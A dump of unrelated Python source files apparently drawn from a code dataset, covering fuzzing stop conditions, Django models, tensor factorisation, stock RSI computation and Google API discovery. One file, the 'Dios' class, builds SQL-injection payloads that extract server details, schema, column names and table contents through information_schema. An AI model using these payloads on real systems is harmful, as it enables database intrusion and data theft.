content
stringlengths 0
894k
| type
stringclasses 2
values |
---|---|
# Copyright 2022 Garda Technologies, LLC. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Originally written by Valery Korolyov <[email protected]>
from typing import Callable, Dict, Optional, Tuple, Any
from time import time
import os
import logging
log = logging.getLogger(__name__)
from bugbane.modules.stats.fuzz.fuzz_stats import FuzzStats
class StopConditionError(Exception):
"""Exception class for errors that happen in stop condition related routines"""
class StopConditions:
"""
Class that holds time-based stop conditions
"""
registry: Dict[str, Callable[[FuzzStats, int], bool]] = {}
@classmethod
def register(cls, name: str) -> Callable[[FuzzStats, int], bool]:
"""Register stop condition in internal registry"""
def wrapper(
wrapped: Callable[[FuzzStats, int], bool]
) -> Callable[[FuzzStats, int], bool]:
if name in cls.registry:
log.warning("replacing '%s' in %s registry", name, cls.__name__)
cls.registry[name] = wrapped
return wrapped
return wrapper
@classmethod
def get(cls, wanted_condition: str) -> Callable[[FuzzStats, int], bool]:
"""Return stop condition function"""
if wanted_condition not in cls.registry:
raise TypeError(
f"stop condition {wanted_condition} is not registered in {cls.__name__}"
)
return cls.registry[wanted_condition]
@classmethod
def met(cls, wanted_condition: str, stats: FuzzStats, seconds: int) -> bool:
"""Check if stop condition met"""
return cls.get(wanted_condition)(stats, seconds)
@StopConditions.register("time_without_finds")
def time_without_finds(stats: FuzzStats, seconds: int) -> bool:
"""The last new path was found N seconds ago (across all instances)"""
now = int(time())
stamp = stats.last_path_timestamp
log.trace(
"now=%s, stamp=%s, now-stamp=%s seconds=%s", now, stamp, now - stamp, seconds
)
return stamp > 0 and (now - stamp) >= seconds
@StopConditions.register("real_run_time")
def real_run_time(stats: FuzzStats, seconds: int) -> bool:
"""Actual test time is N or more seconds"""
now = int(time())
return (now - stats.start_timestamp) >= seconds
@StopConditions.register("total_run_time")
def total_run_time(stats: FuzzStats, seconds: int) -> bool:
"""
Total run time (sum from all instances) is N or more seconds.
FuzzStats holds the most old fuzzer start timestamp, so it is assumed that
all fuzzers start at the same time.
"""
now = int(time())
return stats.num_instances * (now - stats.start_timestamp) >= seconds
def detect_required_stop_condition(
environ: Optional[Dict[str, str]] = None, bane_vars: Optional[Dict[str, Any]] = None
) -> Tuple[str, int]:
"""
Gets condition for stopping fuzzing job.
Returns tuple: (stop condition function name, time in seconds).
Note: bane_vars is not used as of now.
Return first detected:
env var CERT_FUZZ_DURATION set? -> time_without_finds with specified time
env var CERT_FUZZ_LEVEL set? -> time_without_finds with predefined time
env var FUZZ_DURATION set? -> real_run_time with specified time
-> real_run_time with 10 minutes
"""
env = environ or os.environ
bane_vars = bane_vars or {}
log.trace("env size is %d, vars size is %d", len(env), len(bane_vars))
cert_fuzz_duration = env.get("CERT_FUZZ_DURATION")
cert_fuzz_level = env.get("CERT_FUZZ_LEVEL")
ci_fuzz_duration = env.get("FUZZ_DURATION")
try:
if cert_fuzz_duration is not None:
return ("time_without_finds", int(cert_fuzz_duration))
cert_fuzz_levels_time_without_finds = {
4: 2 * 60 * 60, # 4 уровень контроля -> 2 часа без новых путей
3: 4 * 60 * 60,
2: 8 * 60 * 60,
}
if cert_fuzz_level is not None:
duration = cert_fuzz_levels_time_without_finds[int(cert_fuzz_level)]
return ("time_without_finds", duration)
if ci_fuzz_duration is not None:
return ("real_run_time", int(ci_fuzz_duration))
except ValueError as e:
raise StopConditionError(f"Bad environment variable value ({e})") from e
except KeyError as e:
supported_levels = ", ".join(
str(x) for x in cert_fuzz_levels_time_without_finds
)
raise StopConditionError(
f"Supported CERT_FUZZ_LEVEL values: {supported_levels}.\n"
"For other options please use CERT_FUZZ_DURATION=<seconds>"
) from e
log.warning("Wasn't able to detect stop condition. Using default of 10 minutes")
return ("real_run_time", 10 * 60)
| python |
"""
Projects module.
By default, only projects that are listed in the configuration are
loaded automatically. See configuration variables:
*_PLUGINS_AUTOLOAD
*_PLUGINS_PROJECTS
"""
import logging
import importlib
from benchbuild.settings import CFG
LOG = logging.getLogger(__name__)
def discover():
if CFG["plugins"]["autoload"]:
project_plugins = CFG["plugins"]["projects"].value
for project_plugin in project_plugins:
try:
importlib.import_module(project_plugin)
except ImportError as import_error:
LOG.error("Could not find '%s'", project_plugin)
LOG.error("ImportError: %s", import_error.msg)
| python |
# Copyright 2018, Michael DeHaan LLC
# License: Apache License Version 2.0 + Commons Clause
#---------------------------------------------------------------------------
# organization.py - a model of an organization like GitHub organizations
# holding lots of repos for import
#---------------------------------------------------------------------------
import json
from django.contrib.auth.models import Group, User
from django.db import models
from vespene.manager import Shared
from vespene.common.logger import Logger
from vespene.models import BaseModel, as_dict
from vespene.models.build import QUEUED, RUNNING, UNKNOWN
from vespene.manager.permissions import PermissionsManager
permissions = PermissionsManager()
LOG = Logger()
class Organization(models.Model, BaseModel):
class Meta:
db_table = 'organizations'
indexes = [
models.Index(fields=['name'], name='organization_name_idx'),
]
name = models.CharField(unique=True, max_length=512)
description = models.TextField(blank=True)
organization_type = models.CharField(max_length=100)
organization_identifier = models.CharField(max_length=512, help_text="example: 'vespene-io' for github.com/vespene-io/")
api_endpoint = models.CharField(max_length=512, blank=True, default="", help_text="blank, or https://{hostname}/api/v3 for GitHub Enterprise")
import_enabled = models.BooleanField(default=True)
import_without_dotfile = models.BooleanField(default=False)
overwrite_project_name = models.BooleanField(default=True)
overwrite_project_script = models.BooleanField(default=True)
overwrite_configurations = models.BooleanField(default=True)
allow_pipeline_definition = models.BooleanField(default=True)
allow_worker_pool_assignment = models.BooleanField(default=True)
auto_attach_ssh_keys = models.ManyToManyField('SshKey', related_name='+', blank=True, help_text="SSH keys to be assigned to imported projects")
default_worker_pool = models.ForeignKey('WorkerPool', related_name='+', null=False, on_delete=models.PROTECT)
force_rescan = models.BooleanField(default=False, help_text="rescan once at the next opportunity, ignoring refresh_minutes")
refresh_minutes = models.IntegerField(default=120)
scm_login = models.ForeignKey('ServiceLogin', related_name='organizations', on_delete=models.SET_NULL, null=True, help_text="... or add an SSH key in the next tab", blank=True)
worker_pool = models.ForeignKey('WorkerPool', related_name='organizations', null=False, on_delete=models.PROTECT)
created_by = models.ForeignKey(User, related_name='+', null=True, blank=True, on_delete=models.SET_NULL)
last_build = models.ForeignKey('Build', null=True, blank=True, related_name='last_build_for_organization', on_delete=models.SET_NULL)
active_build = models.ForeignKey('Build', null=True, blank=True, related_name='active_build_for_organization', on_delete=models.SET_NULL)
last_successful_build = models.ForeignKey('Build', null=True, blank=True, related_name='last_successful_build_for_organization', on_delete=models.SET_NULL)
def __str__(self):
return self.name
| python |
#coding: utf-8
import sys
from common import reverse_items
if len(sys.argv) != 3:
print "Usage: ", sys.argv[0], "[input] [output]"
exit(1)
reverse_items(sys.argv[1], sys.argv[2])
| python |
import binascii
class Dios:
startSQLi = "0x3C73716C692D68656C7065723E" # <sqli-helper>
endSQLi = "0x3C2F73716C692D68656C7065723E" # </sqli-helper>
endData = "0x3c656e642f3e" # <end/>
def build(self, query):
return f"(select+concat({self.startSQLi},(select+concat({query})),{self.endSQLi}))"
def dump_data(self, tables, columns, database, level=1):
response_query = ''
if level == 1:
column_query = ''
for column in columns:
column = column.strip(' ')
query = "0x" + self.strTohex(f"<{column}>");
query += f",{column},"
query += "0x" + self.strTohex(f"</{column}>");
column_query += query + ","
column_query = column_query.strip(",")
response_query = f"(SELECT+GROUP_CONCAT({column_query},{self.endData})+FROM+{database}.{tables})"
return response_query
def get_information(self,level=1):
if level == 1:
dios = f"(select+concat({self.startSQLi},(select+concat({self.hostname()},{self.port()},{self.user()},{self.version()},{self.database()},{self.os_version()},{self.mechine_version()},{self.base_dir()},{self.data_dir()},{self.ssl()},{self.openssl()},{self.symlink()},{self.socket()})),{self.endSQLi}))"
return dios
def show_columns(self, table_name, dbname, level=1):
if level == 1:
dios = f"(select+group_concat(column_name)+from+information_schema.columns+where+table_name=0x{self.strTohex(table_name)}+and+table_schema=0x{self.strTohex(dbname)})"
return dios
# Get all database
def databases(self, level=1):
if level == 1:
dios = f"(select+group_concat(DISTINCT(table_schema))+from+information_schema.columns)"
return dios
def strTohex(self, string):
hexa = binascii.hexlify(string.encode("utf-8"))
hexa = hexa.decode("utf-8")
return hexa
def hexTostr(self, hexa):
string = binascii.unhexlify(hexa.encode("utf-8"))
string = string.decode("utf-8")
return string
def addslashes(self, s):
d = {'"':'\\"', "'":"\\'", "\0":"\\\0", "\\":"\\\\"}
return ''.join(d.get(c, c) for c in s)
# Method get Information from target
# Hostname
def hostname(self, level=1):
if level == 1:
hostname = f"0x{self.strTohex('<hostname()>')},/*!00000@@hostname*/,0x{self.strTohex('</hostname()>')}"
# print(hostname, level)
return hostname
# Port
def port(self, level=1):
if level == 1:
port = f"0x{self.strTohex('<port()>')},/*!00000@@port*/,0x{self.strTohex('</port()>')}"
return port
# Version
def version(self, level=1):
if level == 1:
version = f"0x{self.strTohex('<version>')},/*!00000@@version*/,0x{self.strTohex('</version>')}"
return version
# User
def user(self, level=1):
if level == 1:
user = f"0x{self.strTohex('<user()>')},/*!00000user()*/,0x{self.strTohex('</user()>')}"
return user
# Database
def database(self, level=1):
if level == 1:
database = f"0x{self.strTohex('<schema()>')},/*!00000schema()*/,0x{self.strTohex('</schema()>')}"
return database
# os_version
def os_version(self, level=1):
if level == 1:
os_version = f"0x{self.strTohex('<os_version>')},/*!00000@@version_compile_os*/,0x{self.strTohex('</os_version>')}"
return os_version
# mechine_version
def mechine_version(self, level=1):
if level == 1:
mechine_version = f"0x{self.strTohex('<mechine_version>')},/*!00000@@VERSION_COMPILE_MACHINE*/,0x{self.strTohex('</mechine_version>')}"
return mechine_version
# base_dir
def base_dir(self, level=1):
if level == 1:
base_dir = f"0x{self.strTohex('<base_dir>')},/*!00000@@basedir*/,0x{self.strTohex('</base_dir>')}"
return base_dir
# data_dir
def data_dir(self, level=1):
if level == 1:
data_dir = f"0x{self.strTohex('<data_dir>')},/*!00000@@datadir*/,0x{self.strTohex('</data_dir>')}"
return data_dir
# ssl
def ssl(self, level=1):
if level == 1:
ssl = f"0x{self.strTohex('<ssl>')},/*!00000@@GLOBAL.have_ssl*/,0x{self.strTohex('</ssl>')}"
return ssl
# openssl
def openssl(self, level=1):
if level == 1:
openssl = f"0x{self.strTohex('<openssl>')},/*!00000@@GLOBAL.have_openssl*/,0x{self.strTohex('</openssl>')}"
return openssl
# symlink
def symlink(self, level=1):
if level == 1:
symlink = f"0x{self.strTohex('<symlink>')},/*!00000@@GLOBAL.have_symlink*/,0x{self.strTohex('</symlink>')}"
return symlink
# socket
def socket(self, level=1):
if level == 1:
socket = f"0x{self.strTohex('<socket>')},/*!00000@@socket*/,0x{self.strTohex('</socket>')}"
return socket
| python |
'''
Created on Nov 11, 2018
@author: nilson.nieto
'''
lst =[1,2,3,4,5,6,7]
print(list(map(lambda a : a**2,lst))) | python |
import warnings
import numpy as np
from hottbox.algorithms.decomposition.cpd import BaseCPD
from hottbox.core.structures import Tensor
from hottbox.core.operations import khatri_rao, hadamard
from hottbox.utils.generation.basic import super_diag_tensor
# TODO: Organise this better - lazy work around used
class CMTF(BaseCPD):
""" Coupled Matrix and Tensor factorization for two ``Tensors`` of order n and 2 with respect to a specified `rank`.
Computed via alternating least squares (ALS)
Parameters
----------
max_iter : int
Maximum number of iteration
epsilon : float
Threshold for the relative error of approximation.
tol : float
Threshold for convergence of factor matrices
random_state : int
verbose : bool
If True, enable verbose output
Attributes
----------
cost : list
A list of relative approximation errors at each iteration of the algorithm.
References
----------
- Acar, Evrim, Evangelos E. Papalexakis, Gozde Gurdeniz, Morten A. Rasmussen,
Anders J. Lawaetz, Mathias Nilsson and Rasmus Bro.
“Structure-revealing data fusion.” BMC Bioinformatics (2013).
- Jeon, Byungsoo & Jeon, Inah & Sael, Lee & Kang, U. (2016).
SCouT: Scalable coupled matrix-tensor factorization—Algorithm and discoveries.
Int. Conf. Data Eng.. 811-822. 10.1109/ICDE.2016.7498292.
"""
# TODO: change init use requiring a change in TensorCPD
def __init__(self, max_iter=50, epsilon=10e-3, tol=10e-5,
random_state=None, verbose=False) -> None:
super(CMTF, self).__init__(init='random',
max_iter=max_iter,
epsilon=epsilon,
tol=tol,
random_state=random_state,
verbose=verbose)
self.cost = []
def copy(self):
""" Copy of the CPD algorithm as a new object """
new_object = super(CMTF, self).copy()
new_object.cost = []
return new_object
@property
def name(self):
""" Name of the decomposition
Returns
-------
decomposition_name : str
"""
decomposition_name = super(CMTF, self).name
return decomposition_name
def decompose(self, tensor, mlst, rank):
""" Performs factorisation using ALS on the two instances of ``tensor``
with respect to the specified ``rank``
Parameters
----------
tensor : Tensor
Multi-dimensional data to be decomposed
mlst : List of `Tensor`
List of two-dimensional `Tensor` to be decomposed
rank : tuple
Desired Kruskal rank for the given ``tensor``. Should contain only one value.
If it is greater then any of dimensions then random initialisation is used
Returns
-------
(fmat_a, fmat_b, t_recon, m_recon) : List(np.ndarray) or np.ndarray
fmat_a, fmat_b are the list of components obtained by applying CMTF
t_recon, m_recon : The reconstructed tensor and list of matrices
"""
if not isinstance(tensor, Tensor):
raise TypeError("Parameter `tensor` should be `Tensor`!")
if not isinstance(mlst, list):
raise TypeError("Parameter `mlst` should be a list of `Tensor`!")
if not isinstance(rank, tuple):
raise TypeError("Parameter `rank` should be passed as a tuple!")
if len(rank) != 1:
raise ValueError("Parameter `rank` should be tuple with only one value!")
if not all(isinstance(m, Tensor) for m in mlst):
raise TypeError("Parameter `mlst` should be a list of `Tensor`!")
if not all(m.order == 2 for m in mlst):
raise ValueError("All elements of `mlst` should be of order 2. It is a list of matrices!")
modes = np.array([list(m.shape) for m in mlst])
num_modes = len(modes)
fmat_a, fmat_b = self._init_fmat(modes[:, 0], modes[:, 1], rank)
norm = tensor.frob_norm
for n_iter in range(self.max_iter):
# Update tensor factors
for i in range(num_modes):
_v = hadamard([np.dot(a_i.T, a_i) for k, a_i in enumerate(fmat_a) if k != i])
_v += fmat_b[i].T.dot(fmat_b[i])
kr_result = khatri_rao(fmat_a, skip_matrix=i, reverse=True)
_prod_a = np.concatenate([tensor.unfold(i, inplace=False).data, mlst[i].data], axis=1)
_prod_b = np.concatenate([kr_result.T, fmat_b[i].T], axis=1).T
fmat_a[i] = _prod_a.dot(_prod_b).dot(np.linalg.pinv(_v))
for i in range(num_modes):
fmat_b[i] = mlst[i].data.T.dot(np.linalg.pinv(fmat_a[i]).T)
t_recon, m_recon = self._reconstruct(fmat_a, fmat_b, num_modes)
residual = np.linalg.norm(tensor.data-t_recon.data)
for i in range(num_modes):
residual += np.linalg.norm(mlst[i].data-m_recon[i].data)
self.cost.append(abs(residual)/norm)
if self.verbose:
print('Iter {}: relative error of approximation = {}'.format(n_iter, self.cost[-1]))
# Check termination conditions
if self.cost[-1] <= self.epsilon:
if self.verbose:
print('Relative error of approximation has reached the acceptable level: {}'
.format(self.cost[-1]))
break
if self.converged:
if self.verbose:
print('Converged in {} iteration(s)'.format(len(self.cost)))
break
if self.verbose and not self.converged and self.cost[-1] > self.epsilon:
print('Maximum number of iterations ({}) has been reached. '
'Variation = {}'.format(self.max_iter, abs(self.cost[-2] - self.cost[-1])))
# TODO: possibly make another structure
return fmat_a, fmat_b, t_recon, m_recon
@property
def converged(self):
""" Checks convergence of the CPD-ALS algorithm.
Returns
-------
bool
"""
# This insures that the cost has been computed at least twice without checking iterations
try:
is_converged = abs(self.cost[-2] - self.cost[-1]) <= self.tol
except IndexError:
is_converged = False
return is_converged
def _init_fmat(self, shape_i, shape_j, rank):
""" Initialisation of matrices used in CMTF
Parameters
----------
shape_i : np.ndarray(int)
Shape[0] of all matrices
shape_j : np.ndarray(int)
Shape[1] of all matrices
rank : int
The rank specified for factorisation
Returns
-------
(fmat_a, fmat_b) : List(np.ndarray)
Two lists of the factor matrices
"""
self.cost = [] # Reset cost every time when method decompose is called
_r = rank[0]
if (np.array(shape_i) < _r).sum() != 0:
warnings.warn(
"Specified rank is greater then one of the dimensions of a tensor ({} > {}).\n"
"Factor matrices have been initialized randomly.".format(_r, shape_i), RuntimeWarning
)
fmat_a = [np.random.randn(i_n, _r) for i_n in shape_i]
fmat_b = [np.random.randn(j_n, _r) for j_n in shape_j]
return fmat_a, fmat_b
@staticmethod
def _reconstruct(fmat_a, fmat_b, n_mat):
""" Reconstruct the tensor and matrix after the coupled factorisation
Parameters
----------
fmat_a : List(np.ndarray)
Multidimensional data obtained from the factorisation
fmat_b : List(np.ndarray)
Multidimensional data obtained from the factorisation
n_mat : int
Number of matrices provided to fuse
Returns
-------
(core_tensor, lrecon) : np.ndarray or List(np.ndarray)
Reconstructed tensor and list of matrices obtained from the factorisation
"""
core_values = np.repeat(np.array([1]), fmat_a[0].shape[1])
_r = (fmat_a[0].shape[1], )
core_shape = _r * len(fmat_a)
core_tensor = super_diag_tensor(core_shape, values=core_values)
for mode, fmat in enumerate(fmat_a):
core_tensor.mode_n_product(fmat, mode=mode, inplace=True)
lrecon = [Tensor(fmat_a[i].dot(fmat_b[i].T)) for i in range(n_mat)]
return core_tensor, lrecon
def plot(self):
print('At the moment, `plot()` is not implemented for the {}'.format(self.name))
| python |
import pathlib
import pandas as pd
from util import Util
# 指定した条件のPdを返す
class Dataset:
def __init__(
self,
feature_names,
target_name="target",
train_years=None,
test_years=None,
cities=None,
):
if feature_names is None:
feature_names = self.get_all_feature_names()
# 目的変数名
self.target_name = target_name
self.train_years = train_years
self.test_years = test_years
self.cities = cities
# Datasetの中でのみ使用するカラム
self.secret_feature_names = ["県名", "date"]
self.feature_names = feature_names.copy()
for name in self.secret_feature_names:
if name in feature_names:
self.secret_feature_names.remove(name)
else:
self.feature_names.append(name)
base_dataset = Util.load_feature("basic_data")
datasets_list = []
for name in self.feature_names:
if name in base_dataset.columns:
datasets_list.append(base_dataset[name])
else:
feature = Util.load_feature(name)
datasets_list.append(feature)
self.dataset = pd.DataFrame().join(datasets_list, how="outer")
@classmethod
def get_all_feature_names(cls):
# すべての特徴の名前を取得する
data = []
basic_data = Util.load_feature("basic_data")
globbed_files = pathlib.Path("./../features/").glob("*.pkl")
for globbed_file in globbed_files:
file_name = globbed_file.name
if file_name == "basic_data.pkl":
continue
data.append(Util.load_feature(file_name[:-4]))
data = basic_data.join(data, how="outer")
return data.columns
# 年度を条件にして絞り込む
def __select_by_year(self, years, data=None):
def __to_year(data):
return data.year
if data is None:
data = self.dataset.copy()
if type(years) == int:
years = [years]
# 年度情報がないデータは削除
data = data.dropna(subset=["date"])
adopted_index = False
for year in years:
adopted_index = (adopted_index) | (data["date"].map(__to_year) == year)
return data[adopted_index]
# 県名を条件にして絞り込む
def __select_by_city(self, city_names, data=None):
if type(city_names) == str:
city_names = [city_names]
if data is None:
data = self.dataset.copy()
# 県名情報がないデータは削除
data = data.dropna(subset=["県名"])
return data[data["県名"].isin(city_names)]
# 年度と県名を条件にして絞り込み、コピーを返す
def get_data(self, year, city):
data = self.__select_by_year(year)
data = self.__select_by_city(city, data)
data = data.drop(self.secret_feature_names, axis=1)
data = data.dropna(subset=[self.target_name])
data = data.dropna()
return data
# 2008 ~ 2017年度のデータ
def get_train(self):
if self.train_years is not None and self.cities is not None:
return self.get_data(self.train_years, self.cities)
else:
return self.get_data([y for y in range(2008, 2018)], "tokyo")
# 2018, 2019年度のデータ
def get_test(self, option=None):
if self.test_years is not None and self.cities is not None:
return self.get_data(self.test_years, self.cities)
else:
return self.get_data([2018, 2019], "tokyo")
def add_past_day_data(self, days_ago, features=None):
if features is None:
features = list(self.dataset.columns.copy())
for name in self.secret_feature_names:
features.remove(name)
if type(days_ago) == int:
days_ago = [days_ago]
for i in days_ago:
for name in features:
self.dataset["p" + str(i) + name] = self.dataset[name].shift(-i)
| python |
from openstatesapi.jurisdiction import make_jurisdiction
J = make_jurisdiction('ga')
J.url = 'http://georgia.gov'
| python |
import numpy as np
import zmq
import logging
import time
from multiprocessing import Process
from sigvisa.infer.swap_rpc.sg_client import run_client
from sigvisa.infer.swap_rpc.swap_server import SwapServer
from sigvisa.infer.swap_rpc.swap_moves import crossover_uatemplates, crossover_event_region_move, swap_events_move
from sigvisa.infer.swap_rpc.serialization import serialize, deserialize
class SgSwapServer(SwapServer):
def __init__(self, *args, **kwargs):
super(SgSwapServer, self).__init__(*args, **kwargs)
self.scbs = {}
self.raw_signals = {}
def do_swap_helper(self, client1, client2):
socket1 = self.swap_sockets[client1]
socket2 = self.swap_sockets[client2]
# both clients should check in to be ready to receive commands
ack1 = socket1.recv()
ack2 = socket2.recv()
assert(ack1 == "SWAPPING")
assert(ack2 == "SWAPPING")
sg1 = SgRpcShim(socket1)
sg2 = SgRpcShim(socket2)
if client1 not in self.scbs:
self.scbs[client1] = sg1.get_scbs()
self.raw_signals[client1] = sg1.get_raw()
if client2 not in self.scbs:
self.scbs[client2] = sg2.get_scbs()
self.raw_signals[client2] = sg2.get_raw()
assert(self.scbs[client1] == self.scbs[client2])
scbs = list(self.scbs[client1])
raw1 = self.raw_signals[client1]
raw2 = self.raw_signals[client2]
"""
for scb in scbs:
accepted = crossover_uatemplates(sg1, sg2, scb, raw1, raw2,
crossover_period_s=5.0,
crossover_period_pre_s = 2.0)
logging.info("crossover at %s: accepted %s" % (str(scb), str(accepted)))
sg1.move_finished("crossover_uatemplates_short", accepted)
sg2.move_finished("crossover_uatemplates_short", accepted)
for scb in scbs:
accepted = crossover_uatemplates(sg1, sg2, scb, raw1, raw2)
logging.info("crossover at %s: accepted %s" % (str(scb), str(accepted)))
sg1.move_finished("crossover_uatemplates", accepted)
sg2.move_finished("crossover_uatemplates", accepted)
"""
accepted = crossover_event_region_move(sg1, sg2, raw1, raw2,
crossover_radius_km=1000,
crossover_radius_s=2000)
logging.info("event region crossover accepted %s" % (str(accepted)))
sg1.move_finished("crossover_event_region", accepted)
sg2.move_finished("crossover_event_region", accepted)
accepted = swap_events_move(sg1, sg2, raw1, raw2)
logging.info("event swap accepted %s" % (str(accepted)))
sg1.move_finished("crossover_event_swap", accepted)
sg2.move_finished("crossover_event_swap", accepted)
sg1.done()
sg2.done()
self._cleanup_swap(client1, client2)
class SgRpcShim(object):
def __init__(self, socket):
self.socket = socket
def get_raw(self):
return self._send_cmd("GET_RAW", kwargs={})
def get_scbs(self):
return self._send_cmd("GET_SCBS", kwargs={})
def get_event_locs(self):
cmd = "GET_EVENT_LOCS"
return self._send_cmd(cmd, kwargs={})
def get_event_templates(self, eid):
kwargs = {"eid": eid}
cmd = "GET_EVENT_TEMPLATES"
return self._send_cmd(cmd, kwargs=kwargs)
def kill_event(self, eid):
kwargs = {"eid": eid}
cmd = "KILL_EVENT"
return self._send_cmd(cmd, kwargs=kwargs)
def birth_event(self, evdict, tmvals, force_id=None):
kwargs = {"evdict": evdict, "tmvals": tmvals, "force_id": force_id}
cmd = "BIRTH_EVENT"
return self._send_cmd(cmd, kwargs=kwargs)
def current_log_p(self):
cmd = "CURRENT_LOG_P"
return self._send_cmd(cmd, kwargs={})
def current_log_p_breakdown(self):
cmd = "BREAKDOWN"
return self._send_cmd(cmd, kwargs={})
def birth_template(self, scb, tmvals, force_id=None):
kwargs = {"scb": scb, "tmvals": tmvals, "force_id": force_id}
cmd = "BIRTH_TEMPLATE"
return self._send_cmd(cmd, kwargs)
def kill_template(self, tmid):
kwargs = {"tmid": tmid}
cmd = "KILL_TEMPLATE"
return self._send_cmd(cmd, kwargs)
def set_template(self, tmid, tmvals):
kwargs = {"tmvals": tmvals, "tmid": tmid}
cmd = "SET_TEMPLATE"
return self._send_cmd(cmd, kwargs)
def logp_at_scb(self, scb):
kwargs = {"scb": scb}
cmd = "LOGP_AT_SCB"
return self._send_cmd(cmd, kwargs)
def uatemplates_at_scb(self, scb):
kwargs = {"scb": scb}
cmd = "UATEMPLATES_AT_SCB"
return self._send_cmd(cmd, kwargs)
def dump_img_scb(self, scb, label):
cmd = "DUMP_IMG_SCB"
kwargs = {"scb": scb, "label": label}
return self._send_cmd(cmd, kwargs)
def debug(self):
msg = "DEBUG"
self.socket.send(msg)
def move_finished(self, move_name, accepted):
cmd = "COUNT"
kwargs = {"move_name": move_name, "accepted": accepted}
return self._send_cmd(cmd, kwargs)
def done(self):
msg = "DONE"
self.socket.send(msg)
def _send_cmd(self, cmd, kwargs):
argstr = serialize(kwargs)
msg = cmd + " " + argstr
self.socket.send(msg)
rstr = self.socket.recv()
resp = deserialize(rstr)
#print "cmd", cmd, "response", rstr, "deserialized", resp
return resp
def run_parallel_coarse_to_fine(names, specs,
server_only=False, client_only=None,
min_swap_s = 20.0,
max_swap_s = 45.0,
allowable_wait_s = 0.5):
# names is an ordered list of strings naming each thread.
# - we will only ever run swap moves between adjacent threads
# specs is a dict mapping name:(modelspec, runspec)
processes = {}
def chain_neighbors(a):
# given a list, return a dict encoding the graph where each
# entry is connected to its predecessor and successor.
d = {}
for i, x in enumerate(a):
d[x] = []
if i > 0:
d[x].append(a[i-1])
if i < len(a)-1:
d[x].append(a[i+1])
return d
control_port=5555
neighbors = chain_neighbors(names)
if client_only is not None:
name = client_only
ms, rs = specs[name]
run_client(name, ms, rs, control_port)
return
if not server_only:
for name in names:
ms, rs = specs[name]
processes[name] = Process(target=run_client, kwargs={"name": name,
"modelspec": ms,
"runspec": rs,
"port": control_port})
processes[name].start()
serv = SgSwapServer(neighbors=neighbors,
min_swap_s = min_swap_s,
allowable_wait_s = allowable_wait_s,
port=control_port)
rootLogger = logging.getLogger()
rootLogger.setLevel("INFO")
def any_children_alive():
if server_only:
return True
for name in names:
if processes[name].is_alive():
return True
return False
while any_children_alive():
serv.process()
logging.debug( "state dump: %s " % serv.client_state)
| python |
#!/usr/bin/env python
# coding: utf-8
# In[79]:
'''
https://github.com/bbmusa
'''
from pandas_datareader import data as pdr
from yahoo_fin import stock_info as si
# In[2]:
import pandas as pd
# In[3]:
import numpy as np
# In[7]:
tickers = si.tickers_nifty50()
# In[17]:
tickers.remove('MM.NS')
# In[72]:
start_date = '2021-11-10'
end_date = '2022-02-14'
# In[73]:
'''
J. Welles Wilder'RSI, Indicator simply find blue chip gold mines for you.
'''
def download_all_stock_data(all_stock_symbols, start_date, end_date):
def download_stock_data(single_symbol):
print(' Downloading '+single_symbol+' data ')
# try:
tmp1=pdr.get_data_yahoo(single_symbol,start=start_date,end=end_date)
# except KeyError:
# pass
return(tmp1)
downloaded_data=map(download_stock_data,all_stock_symbols)
return(pd.concat(downloaded_data,keys=all_stock_symbols, names=['Ticker','Date']))
# In[74]:
stock_data=download_all_stock_data(tickers, start_date, end_date)
fileName = 'downloadedData.pkl'
stock_data.to_pickle(fileName)
# In[80]:
'''
RSI = 100-{100/(1+RS)}
RS= Average gain/Average Loss
This rsi is based on 14 periods which means:
+ first avrage gain = sum of gains over the 14 periods / 14
+ first avrage loss = sum of loss over the 14 periods / 14
'''
def compute_RSI(data,period_RSI):
differencePrice = data['Close'].diff()
differencePriceValues=differencePrice.values
positive_differences=0
negative_differences=0
current_average_positive=0
current_average_negative=0
price_index=0
RSI=[]
for difference in differencePriceValues[1:]:
if difference>0:
positive_difference=difference
negative_difference=0
if difference<0:
negative_difference=np.abs(difference)
positive_difference=0
if difference==0:
negative_difference=0
positive_difference=0
if (price_index<period_RSI):
current_average_positive=current_average_positive+(1/period_RSI)*positive_difference
current_average_negative=current_average_negative+(1/period_RSI)*negative_difference
if(price_index==(period_RSI-1)):
if current_average_negative!=0:
RSI.append(100 - 100/(1+(current_average_positive/current_average_negative)))
else:
RSI.append(100)
else:
current_average_positive=((period_RSI-1)*current_average_positive+positive_difference)/(period_RSI)
current_average_negative=((period_RSI-1)*current_average_negative+negative_difference)/(period_RSI)
if current_average_negative!=0:
RSI.append(100 - 100/(1+(current_average_positive/current_average_negative)))
else:
RSI.append(100)
price_index=price_index+1
RSI_series=pd.Series(data=RSI,index=differencePrice.index[period_RSI:])
return(RSI_series)
# In[76]:
RSI_all_ticker=pd.Series(index=tickers)
for stock_symbol in tickers:
test1=compute_RSI(stock_data.loc[stock_symbol],28)
RSI_all_ticker.loc[stock_symbol]=test1[-1]
RSI_all_ticker.plot(figsize=(12,12))
# In[77]:
RSI_all_ticker.idxmin()
# In[78]:
'''
we consider A perticular stock is overbought if RSI above 70 and
over sold below 30
generally people takes RSI<40 as a Rocket
'''
RSI_all_ticker.nsmallest(80)
# In[ ]:
# In[ ]:
| python |
#!/usr/bin/python3.7
from aiogoogle import Aiogoogle
import os
import sys
import errno
import json
import asyncio
from aiohttp import ClientSession
from aiogoogle import HTTPError
import pprint
def _check_for_correct_cwd(current_dir):
if current_dir[-9:] != "aiogoogle": # current dir is aiogoogle
print(current_dir)
print("must be in aiogoogle's dir, not test dir")
sys.exit()
def _pop_unstable_apis(all_apis: list):
stable_apis = []
for api in all_apis:
if not len(api[1]) > 3: # No funky versions because they break the tests alot
stable_apis.append(api)
return stable_apis
async def refresh_disc_docs_json():
file_errors = []
current_dir = os.getcwd()
# Create new .data/ dir if one doesn't exists
_check_for_correct_cwd(current_dir)
# Refresh all_apis in tests/tests_globals.py
all_apis = []
final_all_apis = []
async with ClientSession() as sess:
apis_pref = await sess.get(
"https://www.googleapis.com/discovery/v1/apis?preferred=true"
)
apis_pref = await apis_pref.json()
for api in apis_pref["items"]:
all_apis.append((api["name"], api["version"]))
all_apis = _pop_unstable_apis(all_apis)
final_all_apis = all_apis
async with Aiogoogle() as google:
tasks = [google.discover(name, version) for (name, version) in all_apis]
print('Requesting all APIs, this might take a while')
